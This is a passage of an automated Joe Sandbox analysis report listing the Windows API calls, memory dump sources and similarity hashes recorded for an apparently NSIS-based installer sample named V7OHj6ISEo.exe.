                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                            • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                            • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,7556123B,?,755612DF,00000019,755611BE,-000000A0), ref: 75561225
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: ed413e80fe676c3fdcf18dc3345a19e95c0c064c715bcf4fa8a023802c0cd95c
                                                                                                            • Instruction ID: c130ae926420adc942a6487d432e18de0b86d85452f6f7624f3914fb75145f54
                                                                                                            • Opcode Fuzzy Hash: ed413e80fe676c3fdcf18dc3345a19e95c0c064c715bcf4fa8a023802c0cd95c
                                                                                                            • Instruction Fuzzy Hash: D1B01272E50040DFEE008B6ECC46F353354E700B11F544001F600CC180C920F8048534
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                            • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                              • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                            • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                            • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                            • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                            • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                            • EmptyClipboard.USER32 ref: 004058B7
                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                            • CloseClipboard.USER32 ref: 00405912
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                            • String ID: (7B${
                                                                                                            • API String ID: 590372296-525222780
                                                                                                            • Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                                                                                            • Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
                                                                                                            • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                            • lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
                                                                                                            • lstrcatW.KERNEL32(?,Call), ref: 004049C3
                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                              • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                              • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                              • Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                              • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                              • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                              • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$A$C:\Users\user\AppData\Local\Iw$Call
                                                                                                            • API String ID: 2624150263-944196606
                                                                                                            • Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                                                                                            • Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
                                                                                                            • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                                                                                            APIs
                                                                                                              • Part of subcall function 7556121B: GlobalAlloc.KERNELBASE(00000040,?,7556123B,?,755612DF,00000019,755611BE,-000000A0), ref: 75561225
                                                                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 75561C6B
                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 75561CB3
                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 75561CBD
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 75561CD0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 75561DB2
                                                                                                            • GlobalFree.KERNEL32(?), ref: 75561DB7
                                                                                                            • GlobalFree.KERNEL32(?), ref: 75561DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 75561FA6
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 75562140
                                                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 755621B5
                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 755621C6
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 75562220
                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 7556223A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 245916457-0
                                                                                                            • Opcode ID: 7ce358d2d77d23c5facf0294310a7d9096cdc47ab8fb3f141a3618d8a08f9595
                                                                                                            • Instruction ID: 04b0828c8d3f1c72d5a69164d3eed5d9454fb7ee9543c0b7e46718805d7df4e1
                                                                                                            • Opcode Fuzzy Hash: 7ce358d2d77d23c5facf0294310a7d9096cdc47ab8fb3f141a3618d8a08f9595
                                                                                                            • Instruction Fuzzy Hash: 52229971D08686DBCB21DFA4C5846FEB7B1FB04B55F10892AD5A7E7280DB709A80CBD1
                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                            Strings
                                                                                                            • C:\Users\user\AppData\Local\Iw, xrefs: 004021C3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstance
                                                                                                            • String ID: C:\Users\user\AppData\Local\Iw
                                                                                                            • API String ID: 542301482-4214039554
                                                                                                            • Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
                                                                                                            • Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
                                                                                                            • Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
                                                                                                            • Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
                                                                                                            • Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A
                                                                                                            APIs
                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                            • GetSysColor.USER32(?), ref: 004045FE
                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                            • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                            • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                            • SetCursor.USER32(00000000), ref: 00404720
                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                            • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                            • String ID: Call$N
                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                            • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                                                                                            • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                                                                                            • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                                                                                            APIs
                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                            • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                            • String ID: F
                                                                                                            • API String ID: 941294808-1304234792
                                                                                                            • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                                                                                            • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                                                                                            • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                                                                                            APIs
                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                                                                                            • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                              • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                            • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                            • wsprintfA.USER32 ref: 004060B3
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                            • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                              • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\V7OHj6ISEo.exe,80000000,00000003), ref: 00405EE2
                                                                                                              • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                            • API String ID: 2171350718-461813615
                                                                                                            • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                            • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                            • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\V7OHj6ISEo.exe",00403480,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
